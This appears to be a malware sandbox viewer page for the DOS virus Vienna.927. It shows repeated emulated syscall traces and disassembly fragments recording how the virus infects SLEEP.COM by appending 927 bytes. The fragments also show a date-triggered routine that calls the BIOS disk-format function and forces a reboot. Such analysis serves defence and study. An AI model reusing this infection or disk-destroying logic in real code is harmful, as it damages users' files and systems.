Sample viewer

vx.netlux.org/Virus.DOS.Vienna.927

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:44:33.834773268Z	47	PC: 12a7e \| Get disk transfer address
2018-12-17T22:44:33.837011252Z	26	PC: 12a60 \| Set disk transfer address
2018-12-17T22:44:33.838810732Z	42	PC: 12a8f \| Get date 0x12a8f: cmp al, 1 0x12a91: jge 0x12a96 0x12a93: jmp 0x12ae6 0x12a95: nop 0x12a96: cmp al, 1 0x12a98: ja 0x12ae6 0x12a9a: jmp 0x12a9d 0x12a9c: nop 0x12a9d: mov dl, 2 0x12a9f: mov ah, 5 0x12aa1: mov ah, 5 0x12aa3: mov dh, 0x80 0x12aa5: mov ch, 0 0x12aa7: int 0x13 0x12aa9: mov cx, 0x14 0x12aac: push cx 0x12aad: call 0x12abd 0x12ab0: mov cx, 0x4000 0x12ab3: mov cx, 0x4000 0x12ab6: loop 0x12ab6

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8256,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:03:59.536400026Z	47	PC: 12a7e \| Get disk transfer address
2018-12-25T12:03:59.538080775Z	26	PC: 12a60 \| Set disk transfer address
2018-12-25T12:03:59.539649593Z	42	PC: 12a8f \| Get date 0x12a8f: cmp al, 1 0x12a91: jge 0x12a96 0x12a93: jmp 0x12ae6 0x12a95: nop 0x12a96: cmp al, 1 0x12a98: ja 0x12ae6 0x12a9a: jmp 0x12a9d 0x12a9c: nop 0x12a9d: mov dl, 2 0x12a9f: mov ah, 5 0x12aa1: mov ah, 5 0x12aa3: mov dh, 0x80 0x12aa5: mov ch, 0 0x12aa7: int 0x13 0x12aa9: mov cx, 0x14 0x12aac: push cx 0x12aad: call 0x12abd 0x12ab0: mov cx, 0x4000 0x12ab3: mov cx, 0x4000 0x12ab6: loop 0x12ab6
2018-12-25T12:03:59.541653259Z	44	PC: 12aec \| Get time 0x12aec: and dh, 0xf 0x12aef: cmp dh, 3 0x12af2: jb 0x12aa9 0x12af4: cmp dh, 3 0x12af7: ja 0x12b23 0x12af9: int 0x19 0x12afb: mov ah, 0x47 0x12afd: mov dl, 0 0x12aff: add si, 0 0x12b02: nop 0x12b03: int 0x21 0x12b05: jb 0x12b23 0x12b07: mov ah, 0x3b 0x12b09: mov dx, si 0x12b0b: add dx, 0x40 0x12b0e: nop 0x12b0f: int 0x21 0x12b11: mov word ptr [bx + 0x44], di 0x12b14: nop 0x12b15: mov si, bx
2018-12-25T12:03:59.5445713Z	78	PC: 12baa \| Find first file
2018-12-25T12:03:59.550483521Z	67	PC: 12beb \| Get or set file attributes
2018-12-25T12:03:59.555856732Z	67	PC: 12bfd \| Get or set file attributes
2018-12-25T12:03:59.9387222Z	61	PC: 12c08 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:59.948618997Z	87	PC: 12c14 \| Get or set file date and time
2018-12-25T12:03:59.950029229Z	44	PC: 12c22 \| Get time 0x12c22: and dh, 7 0x12c25: jmp 0x12c28 0x12c27: nop 0x12c28: mov ah, 0x3f 0x12c2a: mov cx, 3 0x12c2d: mov dx, 0x2a 0x12c30: nop 0x12c31: add dx, si 0x12c33: int 0x21 0x12c35: jb 0x12c92 0x12c37: cmp ax, 3 0x12c3a: jne 0x12c92 0x12c3c: mov ax, 0x4202 0x12c3f: mov cx, 0 0x12c42: mov dx, 0 0x12c45: int 0x21 0x12c47: jb 0x12c92 0x12c49: mov cx, ax 0x12c4b: sub ax, 3 0x12c4e: mov word ptr [si + 0x2e], ax
2018-12-25T12:03:59.951867598Z	63	PC: 12c35 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:03:59.956735134Z	66	PC: 12c47 \| Move file pointer
2018-12-25T12:03:59.958371889Z	64	PC: 12c71 \| Write file or device (Write 927 bytes on handle 5)
2018-12-25T12:03:59.967010428Z	66	PC: 12c83 \| Move file pointer
2018-12-25T12:03:59.968898419Z	64	PC: 12c92 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:03:59.975091589Z	87	PC: 12ca5 \| Get or set file date and time
2018-12-25T12:03:59.976429039Z	62	PC: 12ca9 \| Close file
2018-12-25T12:03:59.984862677Z	67	PC: 12cb8 \| Get or set file attributes
2018-12-25T12:03:59.99461956Z	26	PC: 12cc5 \| Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8256,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:03:59.555683673Z	47	PC: 12a7e \| Get disk transfer address
2018-12-25T12:03:59.557838138Z	26	PC: 12a60 \| Set disk transfer address
2018-12-25T12:03:59.559387248Z	42	PC: 12a8f \| Get date 0x12a8f: cmp al, 1 0x12a91: jge 0x12a96 0x12a93: jmp 0x12ae6 0x12a95: nop 0x12a96: cmp al, 1 0x12a98: ja 0x12ae6 0x12a9a: jmp 0x12a9d 0x12a9c: nop 0x12a9d: mov dl, 2 0x12a9f: mov ah, 5 0x12aa1: mov ah, 5 0x12aa3: mov dh, 0x80 0x12aa5: mov ch, 0 0x12aa7: int 0x13 0x12aa9: mov cx, 0x14 0x12aac: push cx 0x12aad: call 0x12abd 0x12ab0: mov cx, 0x4000 0x12ab3: mov cx, 0x4000 0x12ab6: loop 0x12ab6
2018-12-25T12:03:59.561437623Z	44	PC: 12aec \| Get time 0x12aec: and dh, 0xf 0x12aef: cmp dh, 3 0x12af2: jb 0x12aa9 0x12af4: cmp dh, 3 0x12af7: ja 0x12b23 0x12af9: int 0x19 0x12afb: mov ah, 0x47 0x12afd: mov dl, 0 0x12aff: add si, 0 0x12b02: nop 0x12b03: int 0x21 0x12b05: jb 0x12b23 0x12b07: mov ah, 0x3b 0x12b09: mov dx, si 0x12b0b: add dx, 0x40 0x12b0e: nop 0x12b0f: int 0x21 0x12b11: mov word ptr [bx + 0x44], di 0x12b14: nop 0x12b15: mov si, bx
2018-12-25T12:03:59.563697369Z	78	PC: 12baa \| Find first file
2018-12-25T12:03:59.569712075Z	67	PC: 12beb \| Get or set file attributes
2018-12-25T12:03:59.575156267Z	67	PC: 12bfd \| Get or set file attributes
2018-12-25T12:03:59.937495233Z	61	PC: 12c08 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:03:59.946406772Z	87	PC: 12c14 \| Get or set file date and time
2018-12-25T12:03:59.954501984Z	44	PC: 12c22 \| Get time 0x12c22: and dh, 7 0x12c25: jmp 0x12c28 0x12c27: nop 0x12c28: mov ah, 0x3f 0x12c2a: mov cx, 3 0x12c2d: mov dx, 0x2a 0x12c30: nop 0x12c31: add dx, si 0x12c33: int 0x21 0x12c35: jb 0x12c92 0x12c37: cmp ax, 3 0x12c3a: jne 0x12c92 0x12c3c: mov ax, 0x4202 0x12c3f: mov cx, 0 0x12c42: mov dx, 0 0x12c45: int 0x21 0x12c47: jb 0x12c92 0x12c49: mov cx, ax 0x12c4b: sub ax, 3 0x12c4e: mov word ptr [si + 0x2e], ax
2018-12-25T12:03:59.957002686Z	63	PC: 12c35 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:03:59.971388105Z	66	PC: 12c47 \| Move file pointer
2018-12-25T12:03:59.972727043Z	64	PC: 12c71 \| Write file or device (Write 927 bytes on handle 5)
2018-12-25T12:03:59.980882914Z	66	PC: 12c83 \| Move file pointer
2018-12-25T12:03:59.983102125Z	64	PC: 12c92 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:03:59.989493359Z	87	PC: 12ca5 \| Get or set file date and time
2018-12-25T12:03:59.990970315Z	62	PC: 12ca9 \| Close file
2018-12-25T12:03:59.998702266Z	67	PC: 12cb8 \| Get or set file attributes
2018-12-25T12:04:00.007469148Z	26	PC: 12cc5 \| Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":8256,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:03:59.541433992Z	47	PC: 12a7e \| Get disk transfer address
2018-12-25T12:03:59.54310714Z	26	PC: 12a60 \| Set disk transfer address
2018-12-25T12:03:59.544302984Z	42	PC: 12a8f \| Get date 0x12a8f: cmp al, 1 0x12a91: jge 0x12a96 0x12a93: jmp 0x12ae6 0x12a95: nop 0x12a96: cmp al, 1 0x12a98: ja 0x12ae6 0x12a9a: jmp 0x12a9d 0x12a9c: nop 0x12a9d: mov dl, 2 0x12a9f: mov ah, 5 0x12aa1: mov ah, 5 0x12aa3: mov dh, 0x80 0x12aa5: mov ch, 0 0x12aa7: int 0x13 0x12aa9: mov cx, 0x14 0x12aac: push cx 0x12aad: call 0x12abd 0x12ab0: mov cx, 0x4000 0x12ab3: mov cx, 0x4000 0x12ab6: loop 0x12ab6